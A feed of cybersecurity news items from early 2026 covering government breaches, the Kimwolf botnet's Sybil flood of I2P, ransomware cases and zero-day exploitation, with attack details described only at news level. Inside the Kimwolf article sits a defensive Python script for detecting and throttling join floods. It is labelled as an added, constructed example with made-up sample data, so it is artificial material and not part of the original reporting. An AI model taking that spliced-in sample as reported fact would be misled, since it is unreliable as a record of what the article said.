
Received yesterday — 13 February 2026

60,000 Records Exposed in Cyberattack on Uzbekistan Government

13 February 2026 at 03:46


An alleged Uzbekistan cyberattack that triggered widespread concern online has exposed around 60,000 unique data records, not the personal data of 15 million citizens, as previously claimed on social media. The clarification came from Uzbekistan’s Digital Technologies Minister Sherzod Shermatov during a press conference on 12 February, addressing mounting speculation surrounding the scale of the breach. From 27 to 30 January, information systems of three government agencies in Uzbekistan were targeted by cyberattacks. The names of the agencies have not been disclosed. However, officials were firm in rejecting viral claims suggesting a large-scale national data leak. “There is no information that the personal data of 15 million citizens of Uzbekistan is being sold online. 60,000 pieces of data — that could be five or six pieces of data per person. We are not talking about 60,000 citizens,” the minister noted, adding that law enforcement agencies were examining the types of data involved. For global readers, the distinction matters. In cybersecurity reporting, raw data units are often confused with the number of affected individuals. A single record can include multiple data points such as a name, date of birth, address, or phone number. According to Shermatov, the 60,000 figure refers to individual data units, not the number of citizens impacted.

Uzbekistan Cyberattack: What Actually Happened

The Uzbekistan cyberattack targeted three government information systems over a four-day period in late January. While the breach did result in unauthorized access to certain systems, the ministry emphasized that it was not a mass compromise of citizen accounts. “Of course, there was an attack. The hackers were skilled and sophisticated. They made attempts and succeeded in gaining access to a specific system. In a sense, this is even useful — an incident like this helps to further examine other systems and increase vigilance. Some data, in a certain amount, could indeed have been obtained from some systems,” Shermatov said. His remarks reveal a balanced acknowledgment: the attack was real, the threat actors were capable, and some data exposure did occur. At the same time, the scale appears significantly smaller than initially portrayed online. The ministry also stressed that a “personal data leak” does not mean citizens’ accounts were hacked or that full digital identities were compromised. Instead, limited personal details may have been accessed.

Rising Cyber Threats in Uzbekistan

The Uzbekistan cyberattack comes amid a sharp increase in attempted digital intrusions across the country. According to the ministry, more than 7 million cyber threats were prevented in 2024 through Uzbekistan’s cybersecurity infrastructure. In 2025, that number reportedly exceeded 107 million. Looking ahead, projections suggest that over 200 million cyberattacks could target Uzbekistan in 2026. These figures highlight a broader global trend: as countries accelerate digital transformation, they inevitably expand their attack surface. Emerging digital economies, in particular, often face intense pressure from transnational cybercriminal groups seeking to exploit gaps in infrastructure and rapid system expansion. Uzbekistan’s growing digital ecosystem — from e-government services to financial platforms — is becoming a more attractive target for global threat actors. The recent Uzbekistan cyberattack illustrates that no country, regardless of size, is immune.

Strengthening Security After the Breach

Following the breach, authorities blocked further unauthorized access attempts and reinforced technical safeguards. Additional protections were implemented within the Unified Identification System (OneID), Uzbekistan’s centralized digital identity platform. Under the updated measures, users must now personally authorize access to their data by banks, telecom operators, and other organizations. This shifts more control, and responsibility, directly to citizens. The ministry emphasized that even with partial personal data, fraudsters cannot fully act on behalf of a citizen without direct involvement. However, officials warned that attackers may attempt secondary scams using exposed details. For example, a fraudster could call a citizen, pose as a bank employee, cite known personal details, and claim that someone is applying for a loan in their name — requesting an SMS code to “cancel” the transaction. Such social engineering tactics remain one of the most effective tools for cybercriminals globally.

A Reality Check on Digital Risk

The Uzbekistan cyberattack highlights two critical lessons. First, misinformation can amplify panic faster than technical facts. Second, even limited data exposure carries real risk if exploited creatively. Shermatov’s comment that the incident can help “increase vigilance” reflects a pragmatic view shared by many cybersecurity professionals worldwide: breaches, while undesirable, often drive improvements in resilience. For Uzbekistan, the challenge now is sustaining public trust while hardening systems against growing global cyber threats. For the rest of the world, the incident serves as a reminder that cybersecurity transparency — clear communication about scope and impact — is just as important as technical defense.

Kimwolf Botnet Swamps Anonymity Network I2P

11 February 2026 at 11:08

For the past week, the massive “Internet of Things” (IoT) botnet known as Kimwolf has been disrupting The Invisible Internet Project (I2P), a decentralized, encrypted communications network designed to anonymize and secure online communications. I2P users started reporting disruptions in the network around the same time the Kimwolf botmasters began relying on it to evade takedown attempts against the botnet’s control servers.

Kimwolf is a botnet that surfaced in late 2025 and quickly infected millions of systems, turning poorly secured IoT devices like TV streaming boxes, digital picture frames and routers into relays for malicious traffic and abnormally large distributed denial-of-service (DDoS) attacks.

I2P is a decentralized, privacy-focused network that allows people to communicate and share information anonymously.

“It works by routing data through multiple encrypted layers across volunteer-operated nodes, hiding both the sender’s and receiver’s locations,” the I2P website explains. “The result is a secure, censorship-resistant network designed for private websites, messaging, and data sharing.”

On February 3, I2P users began complaining on the organization’s GitHub page about tens of thousands of routers suddenly overwhelming the network, preventing existing users from communicating with legitimate nodes. Users reported a rapidly increasing number of new routers joining the network that were unable to transmit data, and that the mass influx of new systems had overwhelmed the network to the point where users could no longer connect.

I2P users complaining about service disruptions from a rapidly increasing number of routers suddenly swamping the network.

When one I2P user asked whether the network was under attack, another user replied, “Looks like it. My physical router freezes when the number of connections exceeds 60,000.”

A graph shared by I2P developers showing a marked drop in successful connections on the I2P network around the time the Kimwolf botnet started trying to use the network for fallback communications.

The same day that I2P users began noticing the outages, the individuals in control of Kimwolf posted to their Discord channel that they had accidentally disrupted I2P after attempting to join 700,000 Kimwolf-infected bots as nodes on the network.

The Kimwolf botmaster openly discusses what they are doing with the botnet in a Discord channel with my name on it.

Although Kimwolf is known as a potent weapon for launching DDoS attacks, the outages caused this week by some portion of the botnet attempting to join I2P are what’s known as a “Sybil attack,” a threat in peer-to-peer networks where a single entity can disrupt the system by creating, controlling, and operating a large number of fake, pseudonymous identities.

Indeed, the number of Kimwolf-infected routers that tried to join I2P this past week was many times the network’s normal size. I2P’s Wikipedia page says the network consists of roughly 55,000 computers distributed throughout the world, with each participant acting as both a router (to relay traffic) and a client.
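The Sybil pattern described above has a simple defender-side signature: identities are free to mint, but addresses in distinct networks are not. The following Python script is an added illustration, not I2P or KrebsOnSecurity code. It assumes the overlay exposes a stream of "new router announced" events carrying the router's self-chosen id, its source IP and a timestamp; that event shape, the `RouterSeen` name and all sample data are constructed for the example. It scores a window of joins by the join rate against a baseline and by how much of the growth comes from one network prefix, and shows an admission limiter that caps new identities per prefix without a blocklist.

```python
"""Detecting and throttling a Sybil-style join flood on a peer-to-peer overlay.

Added example, not I2P code. It assumes the overlay exposes a stream of
"new router announced" events with the router's self-chosen id, its source
IP and a timestamp; the event shape and all sample data are constructed.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
import ipaddress
import random


@dataclass(frozen=True)
class RouterSeen:
    router_id: str
    ip: str
    ts: int  # seconds since the epoch


def prefix_key(ip: str, bits: int = 24) -> str:
    """Collapse an address to its /bits network.

    Identities are free to mint, addresses in distinct networks are not, so
    counting per prefix is what makes one operator's many identities visible.
    """
    return str(ipaddress.ip_network(f"{ip}/{bits}", strict=False))


def sybil_indicators(events, now, window=300, history=3600, bits=24):
    """Return (rate_multiple, top_prefix_share) for the window ending at `now`.

    rate_multiple: joins in the current window divided by the average joins
    per window over the preceding `history` seconds (the organic baseline).
    top_prefix_share: fraction of the window's new identities that come from
    the single busiest /bits network. Both rising together is the signature.
    """
    recent = [e for e in events if now - window < e.ts <= now]
    older = [e for e in events if now - history < e.ts <= now - window]
    if not recent:
        return 0.0, 0.0
    baseline = len(older) * window / (history - window) or 1.0
    per_prefix = Counter(prefix_key(e.ip, bits) for e in recent)
    return len(recent) / baseline, max(per_prefix.values()) / len(recent)


class AdmissionLimiter:
    """Admit at most `cap` new identities per /bits network per `window` seconds.

    Organic growth is spread across many networks and passes untouched; a
    single operator pointing thousands of hosts from a few networks at the
    overlay is throttled without any list of bad addresses.
    """

    def __init__(self, cap=20, window=300, bits=24):
        self.cap, self.window, self.bits = cap, window, bits
        self._admits = defaultdict(list)  # prefix -> admit timestamps

    def admit(self, ev: RouterSeen) -> bool:
        key = prefix_key(ev.ip, self.bits)
        live = [t for t in self._admits[key] if ev.ts - self.window < t <= ev.ts]
        self._admits[key] = live
        if len(live) >= self.cap:
            return False
        live.append(ev.ts)
        return True


NOW = 1_700_000_000  # constructed reference time


def build_sample(seed=1):
    """Constructed feed: an hour of organic joins, then a flood from three networks."""
    rng = random.Random(seed)
    organic = [
        RouterSeen(f"org{i}", f"{rng.randint(1, 223)}.{rng.randint(0, 255)}."
                   f"{rng.randint(0, 255)}.{rng.randint(1, 254)}",
                   NOW - rng.randint(0, 3599))
        for i in range(120)
    ]
    flood_nets = ["198.51.100", "203.0.113", "192.0.2"]  # documentation ranges
    flood = [
        RouterSeen(f"syb{i}", f"{rng.choice(flood_nets)}.{rng.randint(1, 254)}",
                   NOW - rng.randint(0, 299))
        for i in range(1500)
    ]
    return sorted(organic + flood, key=lambda e: e.ts)


def run_limiter(events, **kw):
    """Replay events through the limiter; return (admitted, rejected) counts."""
    lim = AdmissionLimiter(**kw)
    admitted = sum(lim.admit(e) for e in events)
    return admitted, len(events) - admitted


if __name__ == "__main__":
    evs = build_sample()
    mult, share = sybil_indicators(evs, NOW)
    print(f"join rate x{mult:.0f} baseline; busiest /24 supplies {share:.0%} of new routers")
    print("admitted/rejected:", run_limiter(evs))
```

On the constructed feed the join rate jumps to well over twenty times the baseline while a single /24 supplies roughly a third of the new identities, and the limiter admits the organic routers plus only sixty of the fifteen hundred flood identities. Real deployments would pick the prefix width and cap from their own baseline; a per-/16 or per-ASN key catches an operator that spreads across adjacent /24s.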

However, Lance James, founder of the New York City based cybersecurity consultancy Unit 221B and the original founder of I2P, told KrebsOnSecurity the entire I2P network now consists of between 15,000 and 20,000 devices on any given day.

An I2P user posted this graph on Feb. 10, showing tens of thousands of routers — mostly from the United States — suddenly attempting to join the network.

Benjamin Brundage is founder of Synthient, a startup that tracks proxy services and was the first to document Kimwolf’s unique spreading techniques. Brundage said the Kimwolf operator(s) have been trying to build a command and control network that can’t easily be taken down by security companies and network operators that are working together to combat the spread of the botnet.

Brundage said the people in control of Kimwolf have been experimenting with using I2P and a similar anonymity network — Tor — as a backup command and control network, although there have been no reports of widespread disruptions in the Tor network recently.

“I don’t think their goal is to take I2P down,” he said. “It’s more they’re looking for an alternative to keep the botnet stable in the face of takedown attempts.”

The Kimwolf botnet created challenges for Cloudflare late last year when it began instructing millions of infected devices to use Cloudflare’s domain name system (DNS) settings, causing control domains associated with Kimwolf to repeatedly usurp Amazon, Apple, Google and Microsoft in Cloudflare’s public ranking of the most frequently requested websites.

James said the I2P network is still operating at about half of its normal capacity, and that a new release is rolling out which should bring some stability improvements over the next week for users.

Meanwhile, Brundage said the good news is Kimwolf’s overlords appear to have quite recently alienated some of their more competent developers and operators, leading to a rookie mistake this past week that caused the botnet’s overall numbers to drop by more than 600,000 infected systems.

“It seems like they’re just testing stuff, like running experiments in production,” he said. “But the botnet’s numbers are dropping significantly now, and they don’t seem to know what they’re doing.”


FIIG Securities Fined AU$2.5 Million Following Prolonged Cybersecurity Failures

10 February 2026 at 04:28


Australian fixed-income firm FIIG Securities has been fined AU$2.5 million after the Federal Court found it failed to adequately protect client data from cybersecurity threats over a period exceeding four years. The penalty follows a major FIIG cyberattack in 2023 that resulted in the theft and exposure of highly sensitive personal and financial information belonging to thousands of clients.

It is the first time the Federal Court has imposed civil penalties for cybersecurity failures under the general obligations of an Australian Financial Services (AFS) license.

In addition to the fine, the court ordered FIIG Securities to pay AU$500,000 toward the Australian Securities and Investments Commission’s (ASIC) enforcement costs. FIIG must also implement a compliance program, including the engagement of an independent expert to ensure its cybersecurity and cyber resilience systems are reasonably managed going forward.

FIIG Cyberattack Exposed Sensitive Client Data After Years of Security Gaps

The enforcement action stems from a ransomware attack that occurred in 2023. ASIC alleged that between March 2019 and June 2023, FIIG Securities failed to implement adequate cybersecurity measures, leaving its systems vulnerable to intrusion. On May 19, 2023, a hacker gained access to FIIG’s IT network and remained undetected for nearly three weeks.

During that time, approximately 385 gigabytes of confidential data were exfiltrated. The stolen data included names, addresses, dates of birth, driver’s licences, passports, bank account details, tax file numbers, and other sensitive information. FIIG later notified around 18,000 clients that their personal data may have been compromised as a result of the FIIG cyberattack.

Alarmingly, FIIG Securities did not discover the breach on its own. The company became aware of the incident only after being contacted by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) on June 2. Despite receiving this warning, FIIG did not launch a formal internal investigation until six days later.

FIIG admitted it had failed to comply with its AFS licence obligations and acknowledged that adequate cybersecurity controls would have enabled earlier detection and response. The firm also conceded that adherence to its own policies and procedures could have prevented much of the client information from being downloaded.

Regulatory Action Against FIIG Securities Sets Precedent for Cybersecurity Enforcement

ASIC Deputy Chair Sarah Court said the case highlights the growing risks posed by cyber threats and the consequences of inadequate controls. “Cyber-attacks and data breaches are escalating in both scale and sophistication, and inadequate controls put clients and companies at real risk,” she said. “ASIC expects financial services licensees to be on the front foot every day to protect their clients. FIIG wasn’t – and they put thousands of clients at risk.”

ASIC Chair Joe Longo described the matter as a broader warning for Australian businesses. “This matter should serve as a wake-up call to all companies on the dangers of neglecting cybersecurity systems,” he said, emphasizing that cybersecurity is not a “set and forget” issue but one that requires continuous monitoring and improvement.

ASIC alleged that FIIG Securities failed to implement basic cybersecurity protection, including properly configured firewalls, regular patching of software and operating systems, mandatory cybersecurity training for staff, and sufficient allocation of financial and human resources to manage cyber risk.

Additional deficiencies cited by ASIC included the absence of an up-to-date incident response plan, ineffective privileged access management, lack of regular vulnerability scanning, failure to deploy endpoint detection and response tools, inadequate use of multi-factor authentication, and a poorly configured Security Information and Event Management (SIEM) system.

Lessons From the FIIG Cyberattack for Australia’s Financial Sector

Cybersecurity experts have pointed out that the significance of the FIIG cyberattack lies not only in the breach itself but in the prolonged failure to implement reasonable protections. Annie Haggar, Partner and Head of Cybersecurity at Norton Rose Fulbright Australia, noted in a LinkedIn post that ASIC’s case provides clarity on what regulators consider “adequate” cybersecurity. Key factors include the nature of the business, the sensitivity of stored data, the value of assets under management, and the potential impact of a successful attack.

The attack on FIIG Securities was later claimed by the ALPHV/BlackCat ransomware group, which stated on the dark web that it had stolen approximately 385GB of data from FIIG’s main server. The group warned the company that it had three days to make contact regarding the consequences of what it described as a failure by FIIG’s IT department.

According to FBI and Center for Internet Security reports, the ALPHV/BlackCat group gains initial access using compromised credentials, deploys PowerShell scripts and Cobalt Strike to disable security features, and uses malicious Group Policy Objects to spread ransomware across networks.

The breach was discovered after an employee reported being locked out of their email account. Further investigation revealed that files had been encrypted and backups wiped. While FIIG managed to restore some systems, other data could not be recovered.

Senegal Confirms Cyberattack on Agency Managing National ID and Biometric Data

10 February 2026 at 02:32


The recent Senegal cyberattack on the Directorate of File Automation (DAF) has done more than disrupt government services. It has exposed how vulnerable the country’s most sensitive data systems really are, and why cybersecurity can no longer be treated as a technical issue handled quietly in the background. DAF, the government agency responsible for managing national ID cards, passports, biometric records, and electoral data, was forced to temporarily shut down operations after detecting a cyber incident. For millions of Senegalese citizens, this means delays in accessing essential identity services. For the country, it raises far bigger concerns about data security and national trust.

Senegal Cyberattack Brings Identity Services to a Standstill

In an official public notice, DAF confirmed that the production of national identity cards had been suspended following the cyberattack. Authorities assured citizens that personal data had not been compromised and that systems were being restored. However, as days passed and the DAF website remained offline, doubts began to grow. A Senegal cyberattack affecting such a critical agency is not something that can be brushed off quickly, especially when biometric and identity data are involved.

[Image: Senegal cyberattack. Source: X]

Hackers Claim Theft of Massive Biometric Data

The situation escalated when a ransomware group calling itself The Green Blood Group claimed responsibility for the attack. The group says it stole 139 terabytes of data, including citizen records, biometric information, and immigration documents. To back up its claims, the hackers released data samples on the dark web. They also shared an internal email from IRIS Corporation Berhad, a Malaysian company working with Senegal on its digital national ID system. In the email, a senior IRIS executive warned that two DAF servers had been breached and that card personalization data may have been accessed. Emergency steps were taken, including cutting network connections and shutting access to external offices. Even if authorities insist that data integrity remains intact, the scale of the alleged breach makes the Senegal cyberattack impossible to ignore.

Implications of the Senegal Cyberattack

DAF is not just another government office. It manages the digital identities of Senegalese citizens. Any compromise—real or suspected—creates long-term risks, from identity fraud to misuse of biometric data. What makes this incident more worrying is that it is not the first major breach. Just months ago, Senegal’s tax authority also suffered a cyberattack. Together, these incidents point to a larger problem: critical systems are being targeted, and attackers are finding ways in. Cybercrime groups are no longer experimenting in Africa. They are operating with confidence, speed, and clear intent. The Green Blood Group, which appeared only recently, has reportedly targeted just two countries so far—Senegal and Egypt. That alone should be taken seriously.

Disputes, Outsourcing, and Cybersecurity Blind Spots

The cyberattack also comes during a payment dispute between the Senegalese government and IRIS Corporation. While no official link has been confirmed, the situation highlights a key issue: when governments rely heavily on third-party vendors, cybersecurity responsibility can become blurred. The lesson from this Senegal cyberattack is simple and urgent. Senegal needs a dedicated National Cybersecurity Agency, along with a central team to monitor, investigate, and respond to cyber incidents across government institutions. Cyberattacks in Africa are no longer rare or unexpected. They are happening regularly, and they are hitting the most sensitive systems. Alongside better technology, organizations must focus on insider threats, staff awareness, and leadership accountability. If sensitive data from this attack is eventually leaked, the damage will be permanent. Senegal still has time to act—but only if this warning is taken seriously.

European Commission Hit by Mobile Infrastructure Data Breach

9 February 2026 at 14:19

European Commission Mobile Cyberattack Thwarted by Quick Action

The European Commission's central infrastructure for managing mobile devices was hit by a cyberattack on January 30, the Commission has revealed. The announcement said the European Commission mobile cyberattack was limited by swift action, but cybersecurity observers are speculating that the incident was linked to another recent European incident involving Netherlands government targets that was revealed around the same time.

European Commission Mobile Cyberattack Detailed

The European Commission’s Feb. 5 announcement said its mobile management infrastructure “identified traces of a cyber-attack, which may have resulted in access to staff names and mobile numbers of some of its staff members. The Commission's swift response ensured the incident was contained and the system cleaned within 9 hours. No compromise of mobile devices was detected.” The Commission said it will “continue to monitor the situation. It will take all necessary measures to ensure the security of its systems. The incident will be thoroughly reviewed and will inform the Commission's ongoing efforts to enhance its cybersecurity capabilities.” The Commission provided no further details on the attack, but observers wondered if it was connected to another incident involving Dutch government targets that was revealed the following day.

Dutch Cyberattack Targeted Ivanti Vulnerabilities

In a Feb. 6 letter to the Dutch Parliament (in Dutch), State Secretary for Justice and Security Arno Rutte said the Dutch Data Protection Authority (AP) and the Council for the Judiciary (Rvdr) had been targeted in an “exploitation of a vulnerability in Ivanti Endpoint Manager Mobile (EPMM).” Rutte said the Dutch National Cyber Security Centre (NCSC) was informed by Ivanti on January 29 about vulnerabilities in EPMM, which is used for managing and securing mobile devices, apps and content.

On January 29, Ivanti warned that two critical zero-day vulnerabilities in EPMM were under attack. CVE-2026-1281 and CVE-2026-1340 are both 9.8-severity code injection flaws, affecting EPMM’s In-House Application Distribution and Android File Transfer Configuration features, and could allow unauthenticated remote attackers to execute arbitrary code on vulnerable on-premises EPMM installations without any prior authentication.

“Based on the information currently available, I can report that at least the AP and the Rvdr have been affected,” Rutte wrote. Work-related data of AP employees, such as names, business email addresses, and telephone numbers, “have been accessed by unauthorized persons,” he added. “Immediate measures were taken after the incident was discovered. In addition, the employees of the AP and the Rvdr have been informed. The AP has reported the incident to its data protection officer. The Rvdr has submitted a preliminary data breach notification to the AP.”

NCSC is monitoring further developments with the Ivanti vulnerability and “is in close contact” with international partners, the letter said. Meanwhile, the Chief Information Officer of the Dutch government “is coordinating the assessment of whether there is a broader impact within the central government.”

European Commission Calls for Stronger Cybersecurity Controls

The European Commission’s statement noted that “As Europe faces daily cyber and hybrid attacks on essential services and democratic institutions, the Commission is committed to further strengthen the EU's cybersecurity resilience and capabilities.” To that end, the Commission introduced a Cybersecurity Package on January 20 to bolster the European Union's cyber defenses. “A central pillar of this initiative is the Cybersecurity Act 2.0, which introduces a framework for a Trusted ICT Supply Chain to mitigate risks from high-risk suppliers,” the EC statement said.

Singapore Launches Largest-Ever Cyber Defense Operation After UNC3886 Targets All Major Telcos


Singapore has launched its largest-ever coordinated cyber defense operation following a highly targeted cyberattack on telecommunications that affected all four of the country’s major telecommunications operators.

The cyberattack in Singapore was attributed to the advanced threat actor UNC3886, according to Minister for Digital Development and Information and Minister-in-charge of Cybersecurity and Smart Nation Group, Josephine Teo. She disclosed the details on Feb. 9 while speaking at an engagement event for cyber defenders involved in the national response effort, codenamed Operation Cyber Guardian.

Teo confirmed that the UNC3886 cyberattack in Singapore targeted M1, Singtel, StarHub, and Simba.

Decoding the UNC3886 Cyberattack in Singapore

Once suspicious activity was detected, the affected operators immediately alerted the Infocomm Media Development Authority (IMDA) and the Cyber Security Agency of Singapore (CSA). CSA, IMDA, and several other government bodies then launched Operation Cyber Guardian to contain the breach.

The operation involved more than 100 cyber defenders from six government agencies, including CSA, IMDA, the Singapore Armed Forces’ Digital and Intelligence Service, the Centre for Strategic Infocomm Technologies, the Internal Security Department, and GovTech, all working closely with the telcos.

Teo said the response has, for now, managed to limit the attackers’ activities. Although the attackers accessed a small number of critical systems in one instance, they were unable to disrupt services or move deeper into the telco networks. “There is also no evidence thus far to suggest that the attackers were able to access or steal sensitive customer data,” she said.

UNC3886 Cyberattack Posed Severe Risks to Essential Services

Despite the containment, Teo warned against complacency. She stressed that the cyberattack in Singapore highlighted the presence of persistent threat actors capable of targeting critical infrastructure. She added that sectors such as power, water, and transport could also face similar threats and urged private-sector operators to remain vigilant.

The government, Teo said, will continue to work closely with critical infrastructure operators through cybersecurity exercises and the sharing of classified threat intelligence to enable early detection and faster response. “But even as we try our best to prevent and detect cyber-attacks, we may not always be able to stop them in time,” she said. “All of us must also be prepared for the threat of disruption.”

The UNC3886 operation was first revealed publicly in July 2025 by Minister for Home Affairs and Coordinating Minister for National Security K Shanmugam. Teo described the telecommunication cyberattack as a “potentially more serious threat” than previous cyber incidents faced by Singapore, noting that it targeted systems directly responsible for delivering essential public services.

“The consequences could have been more severe,” she said. “If the attack went far enough, it could have allowed the attacker to one day cut off telecoms or internet services.”

Investigations later revealed that the UNC3886 cyberattack in Singapore was a deliberate, targeted, and well-planned campaign aimed specifically at the telco sector. The attackers exploited a zero-day vulnerability, a previously unknown flaw for which no patch was available at the time. Teo likened this to “finding a new key that no one else had found, to unlock the doors to our telcos’ information system and networks.”

After gaining access, UNC3886 reportedly stole a small amount of technical data and used advanced techniques to evade detection and erase forensic traces. Beyond espionage, the group was assessed to have the capability to disrupt telecommunications and internet services, which could have had knock-on effects on banking, finance, transport, and medical services.

Telcos and Government Strengthen Defenses Against Persistent Threats

In a joint statement, M1, Singtel, StarHub, and Simba said they face a wide range of cyber threats, including distributed denial-of-service attacks, malware, phishing, and persistent campaigns.

To counter these risks, the telcos said they have implemented defense-in-depth measures and carried out prompt remediation when vulnerabilities are identified. They also emphasized close collaboration with government agencies and industry experts to strengthen resilience. “Protecting our critical infrastructure is a top priority. We will continue to keep pace with the evolving cyber threat landscape and update our measures accordingly,” the statement said.

UNC3886 is a China-linked cyber espionage actor classified as an Advanced Persistent Threat. The “UNC” label indicates that the group remains uncategorized. Cybersecurity researchers have observed that UNC3886 frequently targets network devices and virtualization technologies, often exploiting zero-day vulnerabilities. The group primarily focuses on defense, technology, and telecommunication organizations in the United States and Asia.

Malicious packages for dYdX cryptocurrency exchange empty user wallets

6 February 2026 at 17:16

Open source packages published on the npm and PyPI repositories were laced with code that stole wallet credentials from dYdX developers and backend systems and, in some cases, backdoored devices, researchers said.

“Every application using the compromised npm versions is at risk ….” the researchers, from security firm Socket, said Friday. “Direct impact includes complete wallet compromise and irreversible cryptocurrency theft. The attack scope includes all applications depending on the compromised versions and both developers testing with real credentials and production end-users.”

Packages that were infected were:


Spain Ministry of Science Cyberattack Triggers Partial IT Shutdown

6 February 2026 at 05:02


The Spain Ministry of Science cyberattack has caused a partial shutdown of government IT systems, disrupting services used daily by researchers, universities, students, and businesses across the country. While officials initially described the issue as a “technical incident,” mounting evidence and confirmations from Spanish media now point to a cyberattack involving potentially sensitive academic, personal, and financial data. The Ministry of Science, Innovation and Universities plays a central role in Spain’s research and higher education ecosystem. Any disruption to its digital infrastructure has wide-reaching consequences, making this incident far more serious than a routine systems outage.

Official Notice Confirms System Closure and Suspended Procedures

In a public notice published on its electronic headquarters, the ministry acknowledged the disruption and announced a temporary shutdown of key digital services. “As a result of a technical incident that is currently being assessed, the electronic headquarters of the Ministry of Science, Innovation and Universities has been partially closed.” The notice further stated: “All ongoing administrative procedures are suspended, safeguarding the rights and legitimate interests of all persons affected by said temporary closure, resulting in an extension of all deadlines for the various procedures affected.” The ministry added that deadline extensions would remain in place “until the complete resolution of the aforementioned incident occurs,” citing Article 32 of Law 39/2015. While procedural safeguards are welcome, the lack of early transparency around the nature of the incident raised concerns among affected users.

Spain Ministry of Science Cyberattack: Hacker Claims 

Those concerns intensified when a threat actor using the alias “GordonFreeman” appeared on underground forums claiming responsibility for the Spain Ministry of Science cyberattack. The attacker alleged that they exploited a critical Insecure Direct Object Reference (IDOR) vulnerability, granting “full-admin-level access” to internal systems. Data samples shared online—though not independently verified—include screenshots of official documents, email addresses, enrollment applications, and internal records. Spanish media outlet OKDIARIO reported that a ministry spokesperson confirmed the IT disruption was linked to a cyberattack and that the electronic headquarters had been shut down to assess the scope of the data breach. Although the forum hosting the alleged leak is now offline and the data has not resurfaced elsewhere, the screenshots appear legitimate. If confirmed, this would represent a serious breakdown in access control protections.

Alleged Data Exposure Raises Serious Privacy Concerns

According to claims made by the attacker, the stolen data includes highly sensitive information related to students and researchers, such as:
  • Scanned ID documents, NIEs, and passports
  • Email addresses
  • Payment receipts showing IBAN numbers
  • Academic records, including transcripts and apostilled degrees
  • Curricula containing private personal data
If even a portion of this data is authentic, the Spain Ministry of Science cyberattack could expose thousands of individuals to identity theft, financial fraud, and long-term privacy risks. Academic data, in particular, is difficult to replace or invalidate once leaked.

Spain’s Growing Cybercrime Problem

The Spain Ministry of Science cyberattack does not exist in isolation. Cybercrime now accounts for more than one in six recorded criminal offenses in Spain. Attacks have increased by 35% this year, with more than 45,000 incidents reported daily. Between late February and early March, attacks surged by 750% compared to the same period last year. During the week of 5–11 March 2025, Spain was the most targeted country globally, accounting for 22.6% of all cyber incidents—surpassing even the United States. Two factors continue to drive this trend. Rapid digital transformation, fueled by EU funding, has often outpaced cybersecurity investment. At the same time, ransomware attacks—up 120%—have increasingly targeted organizations with weak defenses, particularly public institutions and SMEs. The Spain Ministry of Science cyberattack stresses a hard truth: digital services without strong security become liabilities, not efficiencies. As public administrations expand online access, cybersecurity can no longer be treated as a secondary concern or an afterthought. Until Spain addresses systemic gaps in public-sector cybersecurity, incidents like the Spain Ministry of Science cyberattack will continue, not as exceptions, but as warnings ignored too long.

La Sapienza Cyberattack Forces Italy’s Largest University Offline


Rome’s Sapienza University, Europe’s largest university by number of on-campus students, is grappling with a major IT outage following a cyberattack on La Sapienza that disrupted digital services across the institution. The La Sapienza cyberattack has forced the university to take critical systems offline as officials work to contain the incident and restore operations.  The university publicly acknowledged the cyberattack on La Sapienza earlier this week through a social media statement, confirming that its IT infrastructure “has been the target of a cyberattack.” As an immediate response, Sapienza ordered a shutdown of its network systems “to ensure the integrity and security of data,” a decision that triggered widespread operational disruptions. 

Updates to the La Sapienza Cyberattack

Sapienza University of Rome enrolls more than 112,500 students, making the impact of the outage particularly significant. Following the incident, university officials notified Italian authorities and established a dedicated technical task force to coordinate remediation and recovery efforts. As of the latest updates, the university’s official website remains offline, and recovery status updates have been communicated primarily through social media channels, including Instagram. To mitigate disruption to students, the university announced the creation of temporary in-person “infopoints.” These locations are intended to provide access to information normally available through digital systems and databases that remain unavailable due to the cyberattack on La Sapienza.

Cyberattack on La Sapienza Linked to BabLock Malware 

While the university has not publicly confirmed the technical nature of the incident or identified those responsible, Italian newspaper Corriere della Sera reports that the La Sapienza cyberattack bears the hallmarks of a ransomware operation. According to the outlet, the attack is allegedly linked to a previously unknown, pro-Russian threat actor known as “Femwar02.” The reporting suggests the attackers used BabLock malware, also referred to as Rorschach, based on observed malware characteristics and operational behavior. BabLock malware first emerged in 2023 and has attracted researchers’ attention for its unusually fast encryption speeds and extensive customization capabilities. Sources cited by Corriere della Sera claim that the systems at Sapienza were encrypted and that a ransom demand exists. However, university staff reportedly have not opened the ransom note, as doing so would trigger a 72-hour countdown timer. As a result, the ransom amount has not been disclosed. This tactic, designed to pressure victims into rapid negotiations, is increasingly common in ransomware campaigns using BabLock malware.

Investigation and Recovery Efforts Continue 

In response to the cyberattack on La Sapienza, university technicians are working alongside Italy’s national Computer Security Incident Response Team (CSIRT), specialists from the Agenzia per la Cybersicurezza Nazionale (ACN), and the Polizia Postale. Their primary objective is to restore systems using backups, which, according to reports, were not affected by the attack.  Italy’s national cybersecurity agency has confirmed that it is investigating the incident. However, neither Sapienza University nor Italian authorities have publicly verified whether the attack involved ransomware or whether any data was exfiltrated. This distinction is critical: encryption-only incidents primarily cause operational disruption, while confirmed data theft can trigger additional legal and regulatory obligations under the EU’s General Data Protection Regulation (GDPR). 

CISA Silently Updates Vulnerabilities Exploited by Ransomware Groups

4 February 2026 at 15:46


The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has been “silently” updating its Known Exploited Vulnerabilities (KEV) catalog when it concludes that vulnerabilities have been exploited by ransomware groups, according to a security researcher. Each KEV entry carries a “Known To Be Used in Ransomware Campaigns?” field that CISA sets to either “Known” or “Unknown.” The problem, according to a blog post by Glenn Thorpe of GreyNoise, is that the agency doesn’t send out advisories when that field changes from “Unknown” to “Known.” Thorpe downloaded daily CISA KEV snapshots for all of 2025 and found that the agency had flipped 59 vulnerabilities that year from “Unknown” to “Known” evidence of exploitation by ransomware groups. “When that field flips from ‘Unknown’ to ‘Known,’ CISA is saying: ‘We have evidence that ransomware operators are now using this vulnerability in their campaigns,’” Thorpe wrote. “That’s a material change in your risk posture. Your prioritization calculus should shift. But there’s no alert, no announcement. Just a field change in a JSON file. This has always frustrated me.” In a statement shared with The Cyber Express, CISA Executive Assistant Director for Cybersecurity Nick Andersen suggested that the agency is considering Thorpe’s input. “We continue to streamline processes and enrich vulnerability data through initiatives like the KEV catalog, the Common Vulnerabilities and Exposures (CVE) Program, and Vulnrichment,” Andersen said. “Feedback from the cybersecurity community is essential as CISA works to enhance the KEV catalog and advance vulnerability prioritization across the ecosystem.”

Microsoft Leads in Vulnerabilities Exploited by Ransomware Groups

